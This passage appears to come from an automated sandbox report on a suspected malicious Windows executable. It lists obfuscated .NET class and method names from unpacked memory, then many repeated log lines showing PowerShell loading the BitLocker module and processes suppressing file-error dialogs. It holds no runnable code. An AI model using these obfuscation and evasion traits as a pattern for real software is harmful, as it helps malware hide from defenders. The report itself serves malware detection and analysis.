                Source: 0.2.oss4CtI8oz.exe.7340000.5.raw.unpack, s6jvvAGqCQkQvvVeAk.csHigh entropy of concatenated method names: 'A04wF2nBkW', 'QRuwUiC0Lj', 'LmUwI7TdlP', 'ykJwik7jxS', 'xRpwqgYCVG', 'A8FwWHo6qf', 'r40weeP5a8', 'RGYwxrcyOB', 'QxOw919dN0', 'H6YwEdTA2U'
                Source: 0.2.oss4CtI8oz.exe.7340000.5.raw.unpack, wl98LCsZR78D1C4pXC.csHigh entropy of concatenated method names: 'Bcbw0Q77Yj', 'quFwDBMOVk', 'cpIwwtIg13', 'WPjwBam4WA', 'rQowfv6wWL', 'QbJwlLl7oD', 'Dispose', 'zbL6yXjmWX', 'gQE6ZLDVsP', 'gx16chfMVR'
                Source: 0.2.oss4CtI8oz.exe.7340000.5.raw.unpack, AG4FgIXalSV6kxD9D8.csHigh entropy of concatenated method names: 'i9kP5RuTKL', 'h5BPhhCHXX', 'mEgcIjZLfV', 'WYjci8CMvo', 'y0WcqGJm9x', 'NNqcWXmQkj', 'dHncenlBW5', 'NtbcxbpCEM', 'dULc9B8wGS', 'vJGcE93iNI'
                Source: 0.2.oss4CtI8oz.exe.7340000.5.raw.unpack, QW4UaspMJGf4pcPukm.csHigh entropy of concatenated method names: 'y6uAcZAV2V', 'CRgAPM2NtU', 'br3AuaN4l7', 'zNaA8g9SUv', 'LtqAwSVXvS', 'KbTA7xpfgf', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.oss4CtI8oz.exe.7340000.5.raw.unpack, kKWyTLaF8tg1ZQL1xL.csHigh entropy of concatenated method names: 'U5oDSeH3CK', 'zVwDMMpp63', 'ToString', 'BdrDyMQmH5', 'J9hDZHiMuP', 'jynDcJBU7J', 'kVaDPCA3mc', 'P25DuAQEj0', 'RL4D8X0PvF', 'ohwD7oYqek'
                Source: 0.2.oss4CtI8oz.exe.7340000.5.raw.unpack, i2hsklJY6IyNQgRa7x.csHigh entropy of concatenated method names: 'Sb4LMJxoH', 'Xn5NgGI10', 'dcGQmxdgR', 'uwIhGFI6d', 'B8h486ng5', 'dTOXcEOi1', 'ksvrxeSn8AC1hwN3gA', 'cNawAC6WckT042eZ1Q', 'F5t61w49p', 'C4uARocJF'
                Source: 0.2.oss4CtI8oz.exe.7340000.5.raw.unpack, DVWMN122K9HgamZKnYm.csHigh entropy of concatenated method names: 'HWaApp0ULQ', 'S5sAzg8nTS', 'IWmBYs9MYi', 'YnfB2NYcOI', 'X84BJYKkH4', 'VnoBg7MsxQ', 'IoKB1XP1mf', 'KgmBoNlXNy', 'Fd2ByIK10O', 'kAMBZgRkVc'
                Source: 0.2.oss4CtI8oz.exe.7340000.5.raw.unpack, ljUsmBZRQBngCLjlpC.csHigh entropy of concatenated method names: 'Dispose', 'k8D2G1C4pX', 'DjFJUdk7Qu', 'e7KZoVihVs', 'y902pH1xWd', 'Sha2zQXDDi', 'ProcessDialogKey', 'JSAJY6jvvA', 'JCQJ2kQvvV', 'LAkJJmW4Ua'
                Source: 0.2.oss4CtI8oz.exe.7340000.5.raw.unpack, H0WVtHzaf6su4HWMce.csHigh entropy of concatenated method names: 'SwdAQokhrv', 'bapA3NdKmt', 'sFgA4mmC75', 'sd2AFSZgMU', 'PECAUwQlnc', 'YyvAinnPTD', 'j6lAqcBtMg', 'qmFAllJdJK', 'igaACI8m5c', 'SICATscLpl'
                Source: 0.2.oss4CtI8oz.exe.7340000.5.raw.unpack, SbLvUp2YNOa8IKA1OaK.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'lanARc2sOq', 'WmHAvHYqdX', 'lAFAHX5nWD', 'xLeAm4GqXk', 'oomAVWcWb2', 'L4LAnwWIwP', 'uICAafbbZr'
                Source: 0.2.oss4CtI8oz.exe.7340000.5.raw.unpack, t7SMjU18Il4xLk0q7w.csHigh entropy of concatenated method names: 'woJ28c2a3e', 'dwb27BrI9N', 'UFb2SmE7Dp', 'o0Q2MI5G4F', 'LD920D8nS4', 'HLQ2keq6xJ', 'h9RDLePgSqeTtnBrCg', 'hnuiqfaDL56C8vwxdn', 'hLv22vTSyg', 'x482gGe4LZ'
                Source: 0.2.oss4CtI8oz.exe.7340000.5.raw.unpack, tnGIQe7bESBeOGbg8N.csHigh entropy of concatenated method names: 'H3qgoWIpOo', 'KJlgy3K33y', 'oUdgZoN15S', 'cvZgcj35hg', 'WXkgPDKMSC', 'RlPguFH446', 'rmRg8O6XoT', 'VDwg7ItLLp', 'O7WgO1RHO6', 'mUSgSZcxcy'
                Source: 0.2.oss4CtI8oz.exe.7340000.5.raw.unpack, SS4ILQFeq6xJlWCQsV.csHigh entropy of concatenated method names: 'CHMuoZwhQS', 'YEhuZbDLEl', 'CCiuPDSbK1', 'DWHu85rssg', 'kM1u7Dxtjs', 'Rk4PjhGXGf', 'PyJPtmc5ld', 'n9ePswrG9V', 'grrPdQx9O5', 'MDJPGXbcgy'
                Source: 0.2.oss4CtI8oz.exe.7340000.5.raw.unpack, kApFyXHlKys05TFri9.csHigh entropy of concatenated method names: 'GIIb3IW6yd', 'veKb4gZgxi', 'VAJbF6OfF7', 'MxUbU5beJq', 'R7hbi1JMnc', 'swcbqoHLvd', 'RXObeA4PcJ', 'NZfbx4AjVy', 'IMHbECLH3o', 'QbFbRK7QCI'
                Source: 0.2.oss4CtI8oz.exe.4021a88.3.raw.unpack, suHcoIe9AHX695RwfE.csHigh entropy of concatenated method names: 'xuT8yOYelr', 'sRk8c7sLgE', 'dBe8uZmdxB', 'cXFupK4ZEL', 'Vq7uzOHnJo', 'pva8YhfYOe', 'QaJ82Jl2KW', 'qUC8JwpMgY', 'Qqf8gLAcoF', 'Hxu81yKUtp'
                Source: 0.2.oss4CtI8oz.exe.4021a88.3.raw.unpack, bc2a3e31wbBrI9NhD4.csHigh entropy of concatenated method names: 'jLaZm1q7IY', 'pySZVJDJIh', 'uf7ZnqGMsY', 'I9pZaRMuW1', 'AcwZj3AtGT', 'fxlZtXxljg', 'yJ7ZsR7jlv', 'WylZduQe9P', 'JY6ZGLOvtc', 'ckXZpVneOW'
                Source: 0.2.oss4CtI8oz.exe.4021a88.3.raw.unpack, Wt66Mj4FbmE7Dp00QI.csHigh entropy of concatenated method names: 'ojHcNckI8H', 'CEWcQ79cnh', 'zVhc3ZTwUN', 'FOfc4w5J72', 'TJ4c09b37N', 'zIcck0pv4k', 'iPVcDqxu1r', 'BWEc64T2Sd', 'r4KcwfhAIp', 'B7CcAXyeoE'
                Source: 0.2.oss4CtI8oz.exe.4021a88.3.raw.unpack, ssZg3f21GuR9AI0O0Kg.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'B6jKwFDdbw', 'FgrKAsx6hu', 'mejKBE3XuQ', 'syaKKw42og', 'qYoKfYoRCt', 'HEOKrmydBO', 'zb9KlX11r3'
                Source: 0.2.oss4CtI8oz.exe.4021a88.3.raw.unpack, XKf49ytqdC6ZOywZBi.csHigh entropy of concatenated method names: 'iTkDd13xam', 'zYtDpk5GyE', 'IwH6YOPsZL', 'bIs62YCDI3', 'tMGDRvQIZv', 'NAHDvr4y8p', 'reVDHodevn', 'jR0DmLG35R', 'g6jDVf5qFy', 'rbQDnYWMEK'
                Source: 0.2.oss4CtI8oz.exe.4021a88.3.raw.unpack, tYe48cmWj55j9fqa2v.csHigh entropy of concatenated method names: 'Yuh0EghXIx', 'yuU0vOfeXx', 'ttG0m9uCNk', 'Rc40VVbJEV', 'scM0UNFY2V', 'Wyl0IqpSed', 'cya0ikBL4H', 'DGP0qxMHlS', 'D7a0WjYwp5', 'tU40eDOs6C'
                Source: 0.2.oss4CtI8oz.exe.4021a88.3.raw.unpack, N6moQ09V21hKtm2FOi.csHigh entropy of concatenated method names: 'YJL8CIipVS', 'EEH8TDXK7M', 'hXl8L11Jy0', 'Rsn8NysYOl', 'flC85ig5yq', 'WZy8QBYXSu', 'kyn8hMkMuS', 'vML83gRero', 'a6A84oIOeV', 'jU28XQhHIR'
                Source: 0.2.oss4CtI8oz.exe.4021a88.3.raw.unpack, s6jvvAGqCQkQvvVeAk.csHigh entropy of concatenated method names: 'A04wF2nBkW', 'QRuwUiC0Lj', 'LmUwI7TdlP', 'ykJwik7jxS', 'xRpwqgYCVG', 'A8FwWHo6qf', 'r40weeP5a8', 'RGYwxrcyOB', 'QxOw919dN0', 'H6YwEdTA2U'
                Source: 0.2.oss4CtI8oz.exe.4021a88.3.raw.unpack, wl98LCsZR78D1C4pXC.csHigh entropy of concatenated method names: 'Bcbw0Q77Yj', 'quFwDBMOVk', 'cpIwwtIg13', 'WPjwBam4WA', 'rQowfv6wWL', 'QbJwlLl7oD', 'Dispose', 'zbL6yXjmWX', 'gQE6ZLDVsP', 'gx16chfMVR'
                Source: 0.2.oss4CtI8oz.exe.4021a88.3.raw.unpack, AG4FgIXalSV6kxD9D8.csHigh entropy of concatenated method names: 'i9kP5RuTKL', 'h5BPhhCHXX', 'mEgcIjZLfV', 'WYjci8CMvo', 'y0WcqGJm9x', 'NNqcWXmQkj', 'dHncenlBW5', 'NtbcxbpCEM', 'dULc9B8wGS', 'vJGcE93iNI'
                Source: 0.2.oss4CtI8oz.exe.4021a88.3.raw.unpack, QW4UaspMJGf4pcPukm.csHigh entropy of concatenated method names: 'y6uAcZAV2V', 'CRgAPM2NtU', 'br3AuaN4l7', 'zNaA8g9SUv', 'LtqAwSVXvS', 'KbTA7xpfgf', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.oss4CtI8oz.exe.4021a88.3.raw.unpack, kKWyTLaF8tg1ZQL1xL.csHigh entropy of concatenated method names: 'U5oDSeH3CK', 'zVwDMMpp63', 'ToString', 'BdrDyMQmH5', 'J9hDZHiMuP', 'jynDcJBU7J', 'kVaDPCA3mc', 'P25DuAQEj0', 'RL4D8X0PvF', 'ohwD7oYqek'
                Source: 0.2.oss4CtI8oz.exe.4021a88.3.raw.unpack, i2hsklJY6IyNQgRa7x.csHigh entropy of concatenated method names: 'Sb4LMJxoH', 'Xn5NgGI10', 'dcGQmxdgR', 'uwIhGFI6d', 'B8h486ng5', 'dTOXcEOi1', 'ksvrxeSn8AC1hwN3gA', 'cNawAC6WckT042eZ1Q', 'F5t61w49p', 'C4uARocJF'
                Source: 0.2.oss4CtI8oz.exe.4021a88.3.raw.unpack, DVWMN122K9HgamZKnYm.csHigh entropy of concatenated method names: 'HWaApp0ULQ', 'S5sAzg8nTS', 'IWmBYs9MYi', 'YnfB2NYcOI', 'X84BJYKkH4', 'VnoBg7MsxQ', 'IoKB1XP1mf', 'KgmBoNlXNy', 'Fd2ByIK10O', 'kAMBZgRkVc'
                Source: 0.2.oss4CtI8oz.exe.4021a88.3.raw.unpack, ljUsmBZRQBngCLjlpC.csHigh entropy of concatenated method names: 'Dispose', 'k8D2G1C4pX', 'DjFJUdk7Qu', 'e7KZoVihVs', 'y902pH1xWd', 'Sha2zQXDDi', 'ProcessDialogKey', 'JSAJY6jvvA', 'JCQJ2kQvvV', 'LAkJJmW4Ua'
                Source: 0.2.oss4CtI8oz.exe.4021a88.3.raw.unpack, H0WVtHzaf6su4HWMce.csHigh entropy of concatenated method names: 'SwdAQokhrv', 'bapA3NdKmt', 'sFgA4mmC75', 'sd2AFSZgMU', 'PECAUwQlnc', 'YyvAinnPTD', 'j6lAqcBtMg', 'qmFAllJdJK', 'igaACI8m5c', 'SICATscLpl'
                Source: 0.2.oss4CtI8oz.exe.4021a88.3.raw.unpack, SbLvUp2YNOa8IKA1OaK.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'lanARc2sOq', 'WmHAvHYqdX', 'lAFAHX5nWD', 'xLeAm4GqXk', 'oomAVWcWb2', 'L4LAnwWIwP', 'uICAafbbZr'
                Source: 0.2.oss4CtI8oz.exe.4021a88.3.raw.unpack, t7SMjU18Il4xLk0q7w.csHigh entropy of concatenated method names: 'woJ28c2a3e', 'dwb27BrI9N', 'UFb2SmE7Dp', 'o0Q2MI5G4F', 'LD920D8nS4', 'HLQ2keq6xJ', 'h9RDLePgSqeTtnBrCg', 'hnuiqfaDL56C8vwxdn', 'hLv22vTSyg', 'x482gGe4LZ'
                Source: 0.2.oss4CtI8oz.exe.4021a88.3.raw.unpack, tnGIQe7bESBeOGbg8N.csHigh entropy of concatenated method names: 'H3qgoWIpOo', 'KJlgy3K33y', 'oUdgZoN15S', 'cvZgcj35hg', 'WXkgPDKMSC', 'RlPguFH446', 'rmRg8O6XoT', 'VDwg7ItLLp', 'O7WgO1RHO6', 'mUSgSZcxcy'
                Source: 0.2.oss4CtI8oz.exe.4021a88.3.raw.unpack, SS4ILQFeq6xJlWCQsV.csHigh entropy of concatenated method names: 'CHMuoZwhQS', 'YEhuZbDLEl', 'CCiuPDSbK1', 'DWHu85rssg', 'kM1u7Dxtjs', 'Rk4PjhGXGf', 'PyJPtmc5ld', 'n9ePswrG9V', 'grrPdQx9O5', 'MDJPGXbcgy'
                Source: 0.2.oss4CtI8oz.exe.4021a88.3.raw.unpack, kApFyXHlKys05TFri9.csHigh entropy of concatenated method names: 'GIIb3IW6yd', 'veKb4gZgxi', 'VAJbF6OfF7', 'MxUbU5beJq', 'R7hbi1JMnc', 'swcbqoHLvd', 'RXObeA4PcJ', 'NZfbx4AjVy', 'IMHbECLH3o', 'QbFbRK7QCI'

                Hooking and other Techniques for Hiding and Protection

                barindex
                Loading BitLocker PowerShell Module
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Users\user\Desktop\oss4CtI8oz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\oss4CtI8oz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\oss4CtI8oz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\oss4CtI8oz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\oss4CtI8oz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\oss4CtI8oz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\oss4CtI8oz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\oss4CtI8oz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\oss4CtI8oz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\oss4CtI8oz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\oss4CtI8oz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\oss4CtI8oz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\oss4CtI8oz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\oss4CtI8oz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\oss4CtI8oz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\oss4CtI8oz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\oss4CtI8oz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\oss4CtI8oz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\oss4CtI8oz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\oss4CtI8oz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\oss4CtI8oz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\oss4CtI8oz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\oss4CtI8oz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\oss4CtI8oz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\oss4CtI8oz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\oss4CtI8oz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\oss4CtI8oz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\oss4CtI8oz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\oss4CtI8oz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\oss4CtI8oz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\oss4CtI8oz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\oss4CtI8oz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\oss4CtI8oz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\oss4CtI8oz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\oss4CtI8oz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\oss4CtI8oz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\oss4CtI8oz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\oss4CtI8oz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\oss4CtI8oz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\oss4CtI8oz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\oss4CtI8oz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\oss4CtI8oz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
